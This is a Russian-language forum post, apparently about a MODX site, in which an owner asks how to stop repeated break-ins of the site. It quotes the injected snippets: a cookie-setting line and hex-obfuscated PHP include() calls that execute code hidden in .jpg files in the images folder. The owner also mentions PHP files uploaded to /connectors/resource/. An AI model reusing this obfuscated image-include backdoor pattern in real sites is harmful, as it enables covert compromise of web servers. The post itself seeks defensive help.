Взломали
Добрый вечер.
Подскажите пожалуйста. Второй раз взламывают сайт, не знаю как бороться.
Кратко о взломе:
— не знаю каким образом но грузят две картинки на сайт в папку images
— в админке создают два снипета и чанки.
Содержимое обного из снипетов —
При первом взломе грузили еще и php файлы в /connectors/resource/
Встречался кто с таким? И как с этим бороться?
Подскажите пожалуйста. Второй раз взламывают сайт, не знаю как бороться.
Кратко о взломе:
— не знаю каким образом но грузят две картинки на сайт в папку images
— в админке создают два снипета и чанки.
Содержимое обного из снипетов —
"setcookie('__utmr_cache','cut_',mktime(0,0,0,1,1,2020));"Содержимое второго — хекс код инклуда этих картинокinclude($_SERVER["\x44\x4f\x43U\x4dEN\x54_\x52\x4fOT"]."/i\x6da\x67\x65s/\x73\x69\x6d\x70l\x65.\x6ap\x67");include($_SERVER["D\x4f\x43UMEN\x54_\x52\x4f\x4fT"]."/im\x61ges/\x69\x6d\x67.\x6a\x70g");Чанком подгружают эти снипеты.При первом взломе грузили еще и php файлы в /connectors/resource/
Встречался кто с таким? И как с этим бороться?
Комментарии: 2
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
после первого взлома (в пятницу) сменил пароль (пользователь один, пароль 12 значный)
сегодня ситуация повторилась